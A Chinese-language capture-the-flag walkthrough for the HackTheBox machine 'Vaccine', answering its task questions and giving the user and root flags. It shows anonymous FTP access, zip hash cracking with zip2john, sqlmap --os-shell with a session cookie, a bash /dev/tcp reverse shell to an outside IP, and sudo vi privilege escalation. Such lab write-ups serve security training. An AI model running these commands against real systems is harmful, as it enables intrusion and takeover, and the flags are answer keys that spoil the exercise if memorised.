靶机:Vaccine
Task1
问题:除了SSH和HTTP,这个盒子上还托管了什么服务?
ftp
nmap扫一下
Task2
问题:此服务可以配置为允许使用特定用户名的任何密码登录。那个用户名是什么?
anonymous
直接空密码登录
Task3
问题:通过此服务下载的文件的名称是什么?
backup.zip
Task4
问题:John the Ripper工具集附带了什么脚本,并以允许破解尝试的格式从受密码保护的zip档案中生成哈希?
zip2john
解压zip时发现有加密,运用工具破解加密的zip中生成哈希
zip2john backup.zip > hashs
再拿字典跑一下得到密码
Task5
问题:网站上管理员用户的密码是什么?
qwerty789
拿到密码解压zip后,在index.php找到MD5加密的
解密一下即可
参考前一关
Task6
问题:什么选项可以传递给sqlmap以尝试通过sql注入来执行命令?
--os-shell
7-9解题过程
我们使用--os-shell进行反弹shell
bash -c "bash -i >& /dev/tcp/10.10.14.212/443 0>&1"
先开启nc监听,然后跑sqlmap输入命令
然后cat /var/www/html/dashboard.php找到密码
当然密码可以用sqlmap爆破出来
sqlmap -u "http://10.129.237.178/dashboard.php?search=1" --cookie "PHPSESSID=ag8on0evhpqu5cgtsr3dbrfget" --users --password --level=3
然后去掉md5,解密一下得到
知道密码后我们直接ssh连接
然后我们想查看下权限
sudo -l
利用刚刚得到的密码登录,发现能用的有一个配置文件
那么我们去搜一下vi的提权命令
这里可以用(b)的,通过修改配置文件pg_hba.conf写入shell
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
然后进入vim编辑器,输入a添加下面命令
:set shell=/bin/sh
然后esc,输入:wq
退出后再次进入配置的文件,直接输入:,继续输入shell即可
我们可以发现用户变为root
先得到user.txt
即可访问root.txt
Task7
问题:postgres用户可以使用sudo作为root用户运行什么程序?
vi
Submit user flag
ec9b13ca4d6229cd5cc1e09980965bf7
Submit root flag
dd6e058e814260bc70e9bbdef2715849